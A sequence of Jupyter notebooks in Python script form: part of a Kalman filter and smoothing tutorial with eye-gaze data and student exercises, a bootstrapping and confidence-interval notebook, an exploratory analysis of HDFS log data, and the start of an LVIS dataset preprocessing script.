'sigma_0': 0.1 * np.eye(n_dim_state), # initial state noise covariance
}
state, obs = sample_lds(100, params)
plot_kalman(state, obs, title='sample')
# + [markdown] colab_type="text"
# ---
# # Section 2: Kalman Filtering
#
# + cellView="form" colab={"base_uri": "https://localhost:8080/", "height": 519} colab_type="code" outputId="fc6da9d9-10af-48e7-a00b-23165bee554e"
#@title Video 3: Kalman Filtering
# Insert the ID of the corresponding youtube video
from IPython.display import YouTubeVideo
video = YouTubeVideo(id="VboZOV9QMOI", width=854, height=480, fs=1)
print("Video available at https://youtu.be/" + video.id)
video
# + [markdown] colab_type="text"
# We want to infer the latent state variable $s_t$ given the measured (observed) variable $y_t$.
#
# $$P(s_t|y_1, ..., y_t, y_{t+1}, ..., y_T)\sim N(\hat{\mu_t}, \hat{\Sigma_t})$$
# + [markdown] colab_type="text"
# First we obtain estimates of the latent state by running the filtering from $n=0,....N$.
# + [markdown] colab_type="text"
# $$s_t^{pred}\sim N(\hat{\mu}_t^{pred},\hat{\Sigma}_t^{pred})$$
#
# Where $\hat{\mu}_t^{pred}$ and $\hat{\Sigma}_t^{pred}$ are derived as follows:
#
# \begin{eqnarray}
# \hat{\mu}_1^{pred} & = & F\hat{\mu}_{0} \\
# \hat{\mu}_t^{pred} & = & F\hat{\mu}_{t-1}
# \end{eqnarray}
#
# *this is the prediction for $s_t$ obtained simply by taking the expected value of $s_{t-1}$ and projecting it forward one step using the transition probability matrix $A$*
#
# \begin{eqnarray}
# \hat{\Sigma}_0^{pred} & = & F\hat{\Sigma}_{0}F^T+Q \\
# \hat{\Sigma}_t^{pred} & = & F\hat{\Sigma}_{t-1}F^T+Q
# \end{eqnarray}
#
# *same for the covariance taking into account the noise covariance $Q$*
#
# update from observation to obtain $\hat{\mu}_t^{filter}$ and $\hat{\Sigma}_t^{filter}$
#
# project to observational space:
# $$y_t^{pred}\sim N(H\hat{\mu}_t^{pred}, H\hat{\Sigma}_t^{pred}H^T+R)$$
#
# update prediction by actual data:
#
# \begin{eqnarray}
# s_t^{filter} & \sim & N(\hat{\mu}_t^{filter}, \hat{\Sigma}_t^{filter}) \\
# \hat{\mu}_t^{filter} & = & \hat{\mu}_t^{pred}+K_t(y_t-H\hat{\mu}_t^{pred}) \\
# \hat{\Sigma}_t^{filter} & = & (I-K_tH)\hat{\Sigma}_t^{pred}
# \end{eqnarray}
#
# Kalman gain matrix:
# $$K_t=\hat{\Sigma}_t^{pred}H^T(H\hat{\Sigma}_t^{pred}H^T+R)^{-1}$$
#
# *we use the latent-only prediction to project it to the observational space and compute a correction proportional to the error $y_t-HFz_{t-1}$ between prediction and data, coefficient of this correction is the Kalman gain matrix*
#
# *if measurement noise is small and dynamics are fast -> estimation will depend mostly on observed data*
# + [markdown] colab_type="text"
# In order to explore the impact of filtering, we will use the following noisy periodic system:
# + colab={"base_uri": "https://localhost:8080/", "height": 465} colab_type="code" outputId="b94ffc1d-b996-4b7d-a0ab-d85f3edff3fc"
# task dimensions
n_dim_state = 2
n_dim_obs = 2
# initialize model parameters
params = {
'F': np.array([[1., 1.], [-(2*np.pi/20.)**2., .9]]), # state transition matrix
'Q': np.eye(n_dim_obs), # state noise covariance
'H': np.eye(n_dim_state), # observation matrix
'R': 1.0 * np.eye(n_dim_obs), # observation noise covariance
'mu_0': np.zeros(n_dim_state), # initial state mean
'sigma_0': 0.1 * np.eye(n_dim_state), # initial state noise covariance
}
state, obs = sample_lds(100, params)
plot_kalman(state, obs, title='sample')
# + [markdown] colab_type="text"
# ## Exercise 2: Implement Kalman filtering
# In this exercise you will implement the Kalman filter (forward) process. Your focus will be on writing the expressions for the Kalman gain, filter mean, and filter covariance at each time step (refer to the equations above).
# + colab={} colab_type="code"
def kalman_filter(data, params):
""" Perform Kalman filtering (forward pass) on the data given the provided
system parameters.
Args:
data (ndarray): a sequence of osbervations of shape(n_timesteps, n_dim_obs)
params (dict): a dictionary of model paramters: (F, Q, H, R, mu_0, sigma_0)
Returns:
ndarray, ndarray: the filtered system means and noise covariance values
"""
# pulled out of the params dict for convenience
F = params['F']
Q = params['Q']
H = params['H']
R = params['R']
n_dim_state = F.shape[0]
n_dim_obs = H.shape[0]
I = np.eye(n_dim_state) # identity matrix
# state tracking arrays
mu = np.zeros((len(data), n_dim_state))
sigma = np.zeros((len(data), n_dim_state, n_dim_state))
# filter the data
for t, y in enumerate(data):
if t == 0:
mu_pred = params['mu_0']
sigma_pred = params['sigma_0']
else:
mu_pred = F @ mu[t-1]
sigma_pred = F @ sigma[t-1] @ F.T + Q
###########################################################################
## TODO for students: compute the filtered state mean and covariance values
# Fill out function and remove
raise NotImplementedError("Student excercise: compute the filtered state mean and covariance values")
###########################################################################
# write the expression for computing the Kalman gain
K = ...
# write the expression for computing the filtered state mean
mu[t] = ...
# write the expression for computing the filtered state noise covariance
sigma[t] = ...
return mu, sigma
# Uncomment below to test your function
# filtered_state_means, filtered_state_covariances = kalman_filter(obs, params)
# plot_kalman(state, obs, filtered_state_means, title="my kf-filter",
# color='r', label='my kf-filter')
# + [markdown] colab={"base_uri": "https://localhost:8080/", "height": 465} colab_type="text" outputId="20b04ce7-d931-491a-eca4-cea96f368cb8"
# [*Click for solution*](https://github.com/NeuromatchAcademy/course-content/tree/master//tutorials/W3D2_HiddenDynamics/solutions/W3D2_Tutorial3_Solution_e9df5afe.py)
#
# *Example output:*
#
# <img alt='Solution hint' align='left' width=1133 height=414 src=https://raw.githubusercontent.com/NeuromatchAcademy/course-content/master/tutorials/W3D2_HiddenDynamics/static/W3D2_Tutorial3_Solution_e9df5afe_0.png>
#
#
# + [markdown] colab_type="text"
# ---
# # Section 3: Fitting Eye Gaze Data
# + cellView="form" colab={"base_uri": "https://localhost:8080/", "height": 519} colab_type="code" outputId="a08ca0cf-a0f1-4294-8da0-3c2af19d4a99"
#@title Video 4: Fitting Eye Gaze Data
# Insert the ID of the corresponding youtube video
from IPython.display import YouTubeVideo
video = YouTubeVideo(id="M7OuXmVWHGI", width=854, height=480, fs=1)
print("Video available at https://youtu.be/" + video.id)
video
# + [markdown] colab_type="text"
# Tracking eye gaze is used in both experimental and user interface applications. Getting an accurate estimation of where someone is looking on a screen in pixel coordinates can be challenging, however, due to the various sources of noise inherent in obtaining these measurements. A main source of noise is the general accuracy of the eye tracker device itself and how well it maintains calibration over time. Changes in ambient light or subject position can further reduce accuracy of the sensor. Eye blinks introduce a different form of noise as interruptions in the data stream which also need to be addressed.
#
# Fortunately we have a candidate solution for handling noisy eye gaze data in the Kalman filter we just learned about. Let's look at how we can apply these methods to a small subset of data taken from the [MIT Eyetracking Database](http://people.csail.mit.edu/tjudd/WherePeopleLook/index.html) [[Judd et al. 2009](http://people.csail.mit.edu/tjudd/WherePeopleLook/Docs/wherepeoplelook.pdf)]. This data was collected as part of an effort to model [visual saliency](http://www.scholarpedia.org/article/Visual_salience) -- given an image, can we predict where a person is most likely going to look.
# + colab={} colab_type="code"
# load eyetracking data
subjects, images = load_eyetracking_data()
# + [markdown] colab_type="text"
# ## Interactive Demo: Tracking Eye Gaze
#
# We have three stimulus images and five different subjects' gaze data. Each subject fixated in the center of the screen before the image appeared, then had a few seconds to freely look around. You can use the widget below to see how different subjects visually scanned the presented image. A subject ID of -1 will show the stimulus images without any overlayed gaze trace.
#
# Note that the images are rescaled below for display purposes, they were in their original aspect ratio during the task itself.
# + cellView="form" colab={"base_uri": "https://localhost:8080/", "height": 494, "referenced_widgets": ["0e4c9c199636484aa4b2106faa4012b6", "bba792b331664ab5926612b0b0fede60", "d8bad2fdd3c045c9862e04daed8bb245", "e90426f956c842fba2d0e50cec1bcdb2", "f3ef359b2564474dbf04c9f02adfbec1", "fb8f5cea2b404b2fb63c51f75911f282", "77d507c867b1409288c08c6eb737a3c6", "21b5ad8c052742f59639fd70d9259e1a", "7e4f22dd4235408794e8026dc08c2d4c", "503b4fe7160240d1873848f5e1fbee87"]} colab_type="code" outputId="cebabe02-d9fa-4026-98f1-9872850bbc3a"
#@title
#@markdown Make sure you execute this cell to enable the widget!
@widgets.interact(subject_id=widgets.IntSlider(-1, min=-1, max=4),
image_id=widgets.IntSlider(0, min=0, max=2))
def plot_subject_trace(subject_id=-1, image_id=0):
if subject_id == -1:
subject = np.zeros((3, 0, 2))
else:
subject = subjects[subject_id]
data = subject[image_id]
img = images[image_id]
fig, ax = plt.subplots()
ax.imshow(img, aspect='auto')
ax.scatter(data[:, 0], data[:, 1], c='m', s=100, alpha=0.7)
ax.set(xlim=(0, img.shape[1]), ylim=(img.shape[0], 0))
# + [markdown] colab_type="text"
# ## Section 3.1: Fitting data with `pykalman`
#
# Now that we have data, we'd like to use Kalman filtering to give us a better estimate of the true gaze. Up until this point we've known the parameters of our LDS, but here we need to estimate them from data directly. We will use the `pykalman` package to handle this estimation using the EM algorithm.
#
# Before exploring fitting models with `pykalman` it's worth pointing out some naming conventions used by the library:
#
# $$
# \begin{align}
# F &: \texttt{transition_matrices} &
# Q &: \texttt{transition_covariance}\\
# H &:\texttt{observation_matrices} &
# R &:\texttt{observation_covariance}\\
# \mu_0 &: \texttt{initial_state_mean} & \Sigma_0 &: \texttt{initial_state_covariance}
# \end{align}
# $$
# + [markdown] colab_type="text"
# The first thing we need to do is provide a guess at the dimensionality of the latent state. Let's start by assuming the dynamics line-up directly with the observation data (pixel x,y-coordinates), and so we have a state dimension of 2.
#
# We also need to decide which parameters we want the EM algorithm to fit. In this case, we will let the EM algorithm discover the dynamics parameters i.e. the $F$, $Q$, $H$, and $R$ matrices.
#
# We set up our `pykalman` `KalmanFilter` object with these settings using the code below.
# + colab={} colab_type="code"
# set up our KalmanFilter object and tell it which parameters we want to
# estimate
np.random.seed(1)
n_dim_obs = 2
n_dim_state = 2
kf = pykalman.KalmanFilter(
n_dim_state=n_dim_state,
n_dim_obs=n_dim_obs,
em_vars=['transition_matrices', 'transition_covariance',
'observation_matrices', 'observation_covariance']
)
# + [markdown] colab_type="text"
# Because we know from the reported experimental design that subjects fixated in the center of the screen right before the image appears, we can set the initial starting state estimate $\mu_0$ as being the center pixel of the stimulus image (the first data point in this sample dataset) with a correspondingly low initial noise covariance $\Sigma_0$. Once we have everything set, it's time to fit some data.
# + colab={"base_uri": "https://localhost:8080/", "height": 225} colab_type="code" outputId="ea9d6b88-6ca3-4704-e58c-51d4efb8b25d"
# Choose a subject and stimulus image
subject_id = 1
image_id = 2
data = subjects[subject_id][image_id]
# Provide the initial states
kf.initial_state_mean = data[0]
kf.initial_state_covariance = 0.1*np.eye(n_dim_state)
# Estimate the parameters from data using the EM algorithm
kf.em(data)
print(f'F =\n{kf.transition_matrices}')
print(f'Q =\n{kf.transition_covariance}')
print(f'H =\n{kf.observation_matrices}')
print(f'R =\n{kf.observation_covariance}')
# + [markdown] colab_type="text"
# We see that the EM algorithm has found fits for the various dynamics parameters. One thing you will note is that both the state and observation matrices are close to the identity matrix, which means the x- and y-coordinate dynamics are independent of each other and primarily impacted by the noise covariances.
#
# We can now use this model to smooth the observed data from the subject. In addition to the source image, we can also see how this model will work with the gaze recorded by the same subject on the other images as well, or even with different subjects.
#
# Below are the three stimulus images overlayed with recorded gaze in magenta and smoothed state from the filter in green, with gaze begin (orange triangle) and gaze end (orange square) markers.
# + cellView="form" colab={"base_uri": "https://localhost:8080/", "height": 319, "referenced_widgets": ["660fcc30493b48e2979078a5a90fabd4", "fdcf83fdcfe8427fbc670bc45804d3fd", "76b462e1e9454b63a414a730d51aaa8b", "0e33aa9c1a4c4d73bdb123ef658e491e", "a9cdf64c64ef44e7b5b3ebd28efb4c11", "c13df8220f9149539275bd7e570970e5", "a173cd4dbbca47f3b38576e825ad9a85"]} colab_type="code" outputId="c5846eaa-77dc-455c-84d0-00672c4d39ba"
#@title
#@markdown Make sure you execute this cell to enable the widget!
@widgets.interact(subject_id=widgets.IntSlider(1, min=0, max=4))
def plot_smoothed_traces(subject_id=0):
subject = subjects[subject_id]
fig, axes = plt.subplots(ncols=3, figsize=(18, 4))
for data, img, ax in zip(subject, images, axes):
ax = plot_gaze_data(data, img=img, ax=ax)
plot_kf_state(kf, data, ax)
# + [markdown] colab_type="text"
# Why do you think one trace from one subject was sufficient to provide a decent fit across all subjects? If you were to go back and change the subject_id and/or image_id for when we fit the data using EM, do you think the fits would be different?
#
# Finally, recall that the orignial task was to use this data to help devlop models of visual salience. While our Kalman filter is able to provide smooth estimates of observed gaze data, it's not telling us anything about *why* the gaze is going in a certain direction. In fact, if we sample data from our parameters and plot them, we get what amounts to a random walk.
# + colab={"base_uri": "https://localhost:8080/", "height": 430} colab_type="code" outputId="45a98d8f-26bc-47de-8a92-18dbcb7e1e5c"
kf_state, kf_data = kf.sample(len(data))
ax = plot_gaze_data(kf_data, img=images[2])
plot_kf_state(kf, kf_data, ax)
# + [markdown] colab_type="text"
# This should not be surprising, as we have given the model no other observed data beyond the pixels at which gaze was detected. We expect there is some other aspect driving the latent state of where to look next other than just the previous fixation location.
#
# In summary, while the Kalman filter is a good option for smoothing the gaze trajectory itself, especially if using a lower-quality eye tracker or in noisy environmental conditions, a linear dynamical system may not be the right way to approach the much more challenging task of modeling visual saliency.
#
# + [markdown] colab_type="text"
# # Bonus
# + [markdown] colab_type="text"
# ## Review on Gaussian joint, marginal and conditional distributions
# + [markdown] colab_type="text"
# Assume
#
# \begin{eqnarray}
# z & = & [x^Ty^T]^T \\
# z & = & \begin{bmatrix}x \\y\end{bmatrix}\sim N\left(\begin{bmatrix}a \\b\end{bmatrix}, \begin{bmatrix}A & C \\C^T & B\end{bmatrix}\right)
# \end{eqnarray}
#
# then the marginal distributions are
#
# \begin{eqnarray}
# x & \sim & N(a, A) \\
# y & \sim & N(b,B)
# \end{eqnarray}
#
# and the conditional distributions are
#
# \begin{eqnarray}
# x|y & \sim & N(a+CB^{-1}(y-b), A-CB^{-1}C^T) \\
# y|x & \sim & N(b+C^TA^{-1}(x-a), B-C^TA^{-1}C)
# \end{eqnarray}
#
# *important take away: given the joint Gaussian distribution we can derive the conditionals*
# + [markdown] colab_type="text"
# ## Kalman Smoothing
# + cellView="form" colab={"base_uri": "https://localhost:8080/", "height": 519} colab_type="code" outputId="9b06ef4d-2b47-4281-8335-e49bc386a11f"
#@title Video 5: Kalman Smoothing and the EM Algorithm
# Insert the ID of the corresponding youtube video
from IPython.display import YouTubeVideo
video = YouTubeVideo(id="4Ar2mYz1Nms", width=854, height=480, fs=1)
print("Video available at https://youtu.be/" + video.id)
video
# + [markdown] colab_type="text"
# Obtain estimates by propagating from $y_T$ back to $y_0$ using results of forward pass ($\hat{\mu}_t^{filter}, \hat{\Sigma}_t^{filter}, P_t=\hat{\Sigma}_{t+1}^{pred}$)
#
# \begin{eqnarray}
# s_t & \sim & N(\hat{\mu}_t^{smooth}, \hat{\Sigma}_t^{smooth}) \\
# \hat{\mu}_t^{smooth} & = & \hat{\mu}_t^{filter}+J_t(\hat{\mu}_{t+1}^{smooth}-F\hat{\mu}_t^{filter}) \\
# \hat{\Sigma}_t^{smooth} & = & \hat{\Sigma}_t^{filter}+J_t(\hat{\Sigma}_{t+1}^{smooth}-P_t)J_t^T \\
# J_t & = & \hat{\Sigma}_t^{filter}F^T P_t^{-1}
# \end{eqnarray}
#
# This gives us the final estimate for $z_t$.
#
# \begin{eqnarray}
# \hat{\mu}_t & = & \hat{\mu}_t^{smooth} \\
# \hat{\Sigma}_t & = & \hat{\Sigma}_t^{smooth}
# \end{eqnarray}
# + [markdown] colab_type="text"
# ### Exercise 3: Implement Kalman smoothing
#
# In this exercise you will implement the Kalman smoothing (backward) process. Again you will focus on writing the expressions for computing the smoothed mean, smoothed covariance, and $J_t$ values.
# + colab={} colab_type="code"
def kalman_smooth(data, params):
""" Perform Kalman smoothing (backward pass) on the data given the provided
system parameters.
Args:
data (ndarray): a sequence of osbervations of shape(n_timesteps, n_dim_obs)
params (dict): a dictionary of model paramters: (F, Q, H, R, mu_0, sigma_0)
Returns:
ndarray, ndarray: the smoothed system means and noise covariance values
"""
# pulled out of the params dict for convenience
F = params['F']
Q = params['Q']
H = params['H']
R = params['R']
n_dim_state = F.shape[0]
n_dim_obs = H.shape[0]
# first run the forward pass to get the filtered means and covariances
mu, sigma = kalman_filter(data, params)
# initialize state mean and covariance estimates
mu_hat = np.zeros_like(mu)
sigma_hat = np.zeros_like(sigma)
mu_hat[-1] = mu[-1]
sigma_hat[-1] = sigma[-1]
# smooth the data
for t in reversed(range(len(data)-1)):
sigma_pred = F @ sigma[t] @ F.T + Q # sigma_pred at t+1
###########################################################################
## TODO for students: compute the smoothed state mean and covariance values
# Fill out function and remove
raise NotImplementedError("Student excercise: compute the smoothed state mean and covariance values")
###########################################################################
# write the expression to compute the Kalman gain for the backward process
J = ...
# write the expression to compute the smoothed state mean estimate
mu_hat[t] = ...
# write the expression to compute the smoothed state noise covariance estimate
sigma_hat[t] = ...
return mu_hat, sigma_hat
# Uncomment once the kalman_smooth function is complete
# smoothed_state_means, smoothed_state_covariances = kalman_smooth(obs, params)
# axes = plot_kalman(state, obs, filtered_state_means, color="r",
# label="my kf-filter")
# plot_kalman(state, obs, smoothed_state_means, color="b",
# label="my kf-smoothed", axes=axes)
# + [markdown] colab={"base_uri": "https://localhost:8080/", "height": 465} colab_type="text" outputId="d07e06a3-7306-4491-fefb-b293c092b1fc"
# [*Click for solution*](https://github.com/NeuromatchAcademy/course-content/tree/master//tutorials/W3D2_HiddenDynamics/solutions/W3D2_Tutorial3_Solution_a0f4822b.py)
#
# *Example output:*
#
# <img alt='Solution hint' align='left' width=1133 height=414 src=https://raw.githubusercontent.com/NeuromatchAcademy/course-content/master/tutorials/W3D2_HiddenDynamics/static/W3D2_Tutorial3_Solution_a0f4822b_0.png>
#
#
# + [markdown] colab_type="text"
# **Forward vs Backward**
#
# Now that we have implementations for both, let's compare their peformance by computing the MSE between the filtered (forward) and smoothed (backward) estimated states and the true latent state.
# + colab={"base_uri": "https://localhost:8080/", "height": 52} colab_type="code" outputId="0c29490d-a511-433f-c542-bb3459f90941"
print(f"Filtered MSE: {np.mean((state - filtered_state_means)**2):.3f}")
print(f"Smoothed MSE: {np.mean((state - smoothed_state_means)**2):.3f}")
# + [markdown] colab_type="text"
# In this example, the smoothed estimate is clearly superior to the filtered one. This makes sense as the backward pass is able to use the forward pass estimates and correct them given all the data we've collected.
#
# So why would you ever use Kalman filtering alone, without smoothing? As Kalman filtering only depends on already observed data (i.e. the past) it can be run in a streaming, or on-line, setting. Kalman smoothing relies on future data as it were, and as such can only be applied in a batch, or off-line, setting. So use Kalman filtering if you need real-time corrections and Kalman smoothing if you are considering already-collected data.
# + [markdown] colab_type="text"
# ## The Expectation-Maximization (EM) Algorithm
# + [markdown] colab_type="text"
# - want to maximize $log p(y|\theta)$
#
# - need to marginalize out latent state *(which is not tractable)*
#
# $$p(y|\theta)=\int p(y,s|\theta)dz$$
#
# - add a probability distribution $q(s)$ which will approximate the latent state distribution
#
# $$log p(y|\theta)\int_s q(s)dz$$
#
# - can be rewritten as
#
# $$\mathcal{L}(q,\theta)+KL\left(q(s)||p(s|y),\theta\right)$$
#
# - $\mathcal{L}(q,\theta)$ contains the joint distribution of $y$ and $s$
#
# - $KL(q||p)$ contains the conditional distribution of $s|y$
#
# #### Expectation step
# - parameters are kept fixed
# - find a good approximation $q(s)$: maximize lower bound $\mathcal{L}(q,\theta)$ with respect to $q(s)$
# - (already implemented Kalman filter+smoother)
#
# #### Maximization step
# - keep distribution $q(s)$ fixed
# - change parameters to maximize the lower bound $\mathcal{L}(q,\theta)$
#
# As mentioned, we have already effectively solved for the E-Step with our Kalman filter and smoother. The M-step requires further derivation, which is covered in the Appendix. Rather than having you implement the M-Step yourselves, let's instead turn to using a library that has already implemented EM for exploring some experimental data from cognitive neuroscience.
#
#
#
# + [markdown] colab_type="text"
# ### The M-step for a LDS
# *(see Bishop, chapter 13.3.2 Learning in LDS)*
# Update parameters of the probability distribution
#
# *For the updates in the M-step we will need the following posterior marginals obtained from the Kalman smoothing results* $\hat{\mu}_t^{smooth}, \hat{\Sigma}_t^{smooth}$
#
# $$
# \begin{eqnarray}
# E(s_t) &=& \hat{\mu}_t \\
# E(s_ts_{t-1}^T) &=& J_{t-1}\hat{\Sigma}_t+\hat{\mu}_t\hat{\mu}_{t-1}^T\\
# E(s_ts_{t}^T) &=& \hat{\Sigma}_t+\hat{\mu}_t\hat{\mu}_{t}^T
# \end{eqnarray}
# $$
#
# **Update parameters**
#
# Initial parameters
# $$
# \begin{eqnarray}
# \mu_0^{new}&=& E(s_0)\\
# Q_0^{new} &=& E(s_0s_0^T)-E(s_0)E(s_0^T) \\
# \end{eqnarray}
# $$
#
# Hidden (latent) state parameters
# $$
# \begin{eqnarray}
# F^{new} &=& \left(\sum_{t=2}^N E(s_ts_{t-1}^T)\right)\left(\sum_{t=2}^N E(s_{t-1}s_{t-1}^T)\right)^{-1} \\
# Q^{new} &=& \frac{1}{T-1} \sum_{t=2}^N E\big(s_ts_t^T\big) - F^{new}E\big(s_{t-1}s_{t}^T\big) - E\big(s_ts_{t-1}^T\big)F^{new}+F^{new}E\big(s_{t-1}s_{t-1}^T\big)\big(F^{new}\big)^{T}\\
# \end{eqnarray}
# $$
#
# Observable (measured) space parameters
# $$H^{new}=\left(\sum_{t=1}^N y_t E(s_t^T)\right)\left(\sum_{t=1}^N E(s_t s_t^T)\right)^{-1}$$
# $$R^{new}=\frac{1}{T}\sum_{t=1}^Ny_ty_t^T-H^{new}E(s_t)y_t^T-y_tE(s_t^T)H^{new}+H^{new}E(s_ts_t^T)H_{new}$$
# + [markdown] colab_type="text"
# ## Handling Eye Blinks
#
# In the MIT Eyetracking Database, raw tracking data includes times when the subject blinked. The way this is represented in the data stream is via negative pixel coordinate values.
#
# We could try to mitigate these samples by simply deleting them from the stream, though this introduces other issues. For instance, if each sample corresponds to a fixed time step, and you arbitrarily remove some samples, the integrity of that consistent timestep between samples is lost. It's sometimes better to flag data as missing rather than to pretend it was never there at all, especially with time series data.
#
# Another solution is to used masked arrays. In `numpy`, a [masked array](https://numpy.org/doc/stable/reference/maskedarray.generic.html#what-is-a-masked-array) is an `ndarray` with an additional embedded boolean masking array that indicates which elements should be masked. When computation is performed on the array, the masked elements are ignored. Both `matplotlib` and `pykalman` work with masked arrays, and, in fact, this is the approach taken with the data we explore in this notebook.
#
# In preparing the dataset for this noteook, the original dataset was preprocessed to set all gaze data as masked arrays, with the mask enabled for any pixel with a negative x or y coordinate.
|
tutorials/W3D2_HiddenDynamics/student/W3D2_Tutorial3.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# %matplotlib inline
import pandas as pd
import numpy as np
import scipy.stats
import matplotlib.pyplot as plt
# # Bootstrapping (Nonparametric Inference)
# - *random sampling with replacement*
# - resampling technique to simulate drawing new samples (where repeating experiments is not feasible or possible)
# - typically, the new sample has size *n*, where *n* is the size of the original dataset
# ## Sample mean, standard error of the mean, and estimating the population mean
# +
df = pd.read_csv('../datasets/iris/iris.csv')
x = df['sepal_length'].values
x_mean = np.mean(x)
plt.hist(x, bins=10)
plt.axvline(x_mean, color='orange', label='sample mean: %.2f' % x_mean)
plt.xlabel('sepal length in cm')
plt.ylabel('count')
plt.legend(loc=1)
plt.show()
# -
# #### Standard Error (SE)
# $$SE_{\bar{x}} = \frac{s}{\sqrt{n}}$$
#
# - the standard error *SE* (or *standard error of the mean*) estimates the standard deviation (*s*) of the sample mean ($\bar{x}$)
# - i.e., the *SE* measures the variability when taking different samples from the population
# - in other words, the *SE* measures the variability between samples, whereas the sample standard deviation measures the variability within a sample
# - we use the standard error to judge how "good" our estimate of the population mean ($\mu$) is
se = np.std(x, ddof=1) / np.sqrt(x.shape[0])
print('standard error', se)
scipy.stats.sem(x)
# #### Bootstrapping and estimating the population mean
def bootstrap_means(x, n_bootstrap_samples, seed=None):
rng = np.random.RandomState(seed)
sample_means = np.zeros(shape=n_bootstrap_samples)
for i in range(n_bootstrap_samples):
boot_sample = rng.choice(x, size=x.shape[0], replace=True)
# replicate is a general term for a statistic computed
# from a bootstrap sample
bootstrap_replicate = np.mean(boot_sample)
sample_means[i] = bootstrap_replicate
return sample_means
# +
boot_50 = bootstrap_means(x, n_bootstrap_samples=50, seed=123)
boot_mean = np.mean(boot_50)
plt.hist(boot_50, bins=10)
plt.axvline(boot_mean, color='orange', label='samples mean: %.2f' % boot_mean)
plt.xlabel('mean sepal length in cm')
plt.ylabel('count')
plt.legend(loc=2)
plt.show()
# +
boot_2500 = bootstrap_means(x, n_bootstrap_samples=2500, seed=123)
boot_mean = np.mean(boot_2500)
plt.hist(boot_2500, bins=15)
plt.axvline(boot_mean, color='orange', label='samples mean: %.2f' % boot_mean)
plt.xlabel('mean sepal length in cm')
plt.ylabel('count')
plt.legend(loc=2)
plt.show()
# -
# - note: no matter how the sample is distributed, the sample mean follows a normal distribution
np.std(boot_2500, ddof=1)
# - remember, the standard deviation of the bootstrap replicates (means) estimates the standard error of the mean (which estimates the standard deviation of the population mean)
se = np.std(x, ddof=1) / np.sqrt(x.shape[0])
print('standard error', se)
def empirical_cdf(sample):
x = np.sort(sample)
y = np.arange(1, x.shape[0] + 1) / x.shape[0]
return x, y
ecdf_x, ecdf_y = empirical_cdf(boot_2500)
plt.scatter(ecdf_x, ecdf_y)
plt.xlabel('mean')
plt.ylabel('CDF')
# ## Confidence Intervals
# - 95% confidence interval: 95% of the sample means (if we would draw new samples / repeat the experiments) would fall within the confidence interval
# #### From bootstrap replicates:
# +
boot_2500 = bootstrap_means(x, n_bootstrap_samples=2500, seed=123)
lower, upper = np.percentile(boot_2500, [2.5, 97.5])
print('95%% confidence interval: [%.2f, %.2f]' % (lower, upper))
# -
# #### From the original data (i.e., from a single sample):
# +
def confidence_interval(x, ci=0.95):
x_mean = np.mean(x)
se = np.std(x, ddof=1) / np.sqrt(x.shape[0])
h = se * scipy.stats.t._ppf((1 + ci)/2. , x.shape[0])
return x_mean - h, x_mean + h
lower, upper = confidence_interval(x, ci=0.95)
print('95%% confidence interval: [%.2f, %.2f]' % (lower, upper))
# +
se = np.std(x, ddof=1) / np.sqrt(x.shape[0])
lower, upper = scipy.stats.norm.interval(alpha=0.95,
loc=np.mean(x),
scale=se)
print('95%% confidence interval: [%.2f, %.2f]' % (lower, upper))
|
code/bootstrapping.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import re
import pandas as pd
import os
os.chdir("/Volumes/UBC/Block6/586-AdvanceMachineLearning/project/machinelearningproject")
# Run this cell to ensure that altair plots show up in the exported HTML
# and that the R cell magic works
import altair as alt
# Save a vega-lite spec and a PNG blob for each plot in the notebook
alt.renderers.enable('mimetype')
# Handle large data sets without embedding them in the notebook
alt.data_transformers.enable('data_server')
# -
parsed_data = pd.read_csv("data/processed_data/HDFS/HDFS_2k_structured.csv")
parsed_data.head()
parsed_data.tail()
parsed_data.info()
parsed_data.describe()
alt.Chart(parsed_data).mark_bar().encode(
x=alt.X('Time', bin=alt.Bin(maxbins=24)),
y='count()'
).properties(
height=100
)
(alt.Chart(parsed_data)
.mark_line().encode(
alt.X('Date'),
y = 'count()',
).properties(
height=300, width = 500
))
alt.Chart(parsed_data).mark_bar().encode(
x=alt.X('Tag'),
y='count()',
color = "Tag").properties(
height=300, width = 500
)
alt.Chart(parsed_data).mark_bar().encode(
x=alt.X('Level'),
y = 'count()',
color = "Level").properties(
height=200, width = 100
)
alt.Chart(parsed_data).mark_point().encode(
x= alt.X('Date'),
y = alt.Y('PID'),
color = "Date").properties(
height=100, width = 500
)
alt.Chart(parsed_data).mark_point().encode(
x= alt.X('Date'),
y = alt.Y('Component'),
color = "Component").properties(
height=100, width = 500
)
|
data/eda_code/EDA1.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: maskrcnn_benchmark
# language: python
# name: maskrcnn_benchmark
# ---
import os, sys
import argparse
import numpy as np
from collections import defaultdict
import json
import time
import multiprocessing
import copy
import os.path as osp
# from utils import IdGenerator, id2rgb
import pdb
import torch
try:
import PIL.Image as Image
except:
print("Failed to import the image processing packages.")
sys.exit(-1)
from pycocotools.coco import COCO
import numpy as np
# import skimage.io as io
import pylab
stage='val'
b = 110
step = 160
save_path = './datasets/lvis/lvis_trainval_1230'
inst_gt_json_file = "./datasets/lvis/lvis_v0.5_"+stage+".json"
data_path = './datasets/lvis/images/'+stage+'2017'
with open(inst_gt_json_file, 'r') as f:
inst_gt = json.load(f)
sorted_cls_id_file = os.path.join(save_path, 'lvis_sorted_id_all.json')
with open(sorted_cls_id_file, 'r') as f:
sorted_cls_id = json.load(f)
sorted_class_ids_top_b = sorted_cls_id[:b]
json.dump(sorted_class_ids_top_b, open(os.path.join(save_path, 'lvis_sorted_id_top'+str(b)+'.json'), 'w'))
# +
import torch
import torchvision
min_keypoints_per_image = 10
def _count_visible_keypoints(anno):
return sum(sum(1 for v in ann["keypoints"][2::3] if v > 0) for ann in anno)
def _has_only_empty_bbox(anno):
return all(any(o <= 1 for o in obj["bbox"][2:]) for obj in anno)
def has_valid_annotation(anno):
# if it's empty, there is no annotation
if len(anno) == 0:
return False
# if all boxes have close to zero area, there is no annotation
if _has_only_empty_bbox(anno):
return False
# keypoints task have a slight different critera for considering
# if an annotation is valid
if "keypoints" not in anno[0]:
return True
# for keypoint detection tasks, only consider valid images those
# containing at least min_keypoints_per_image
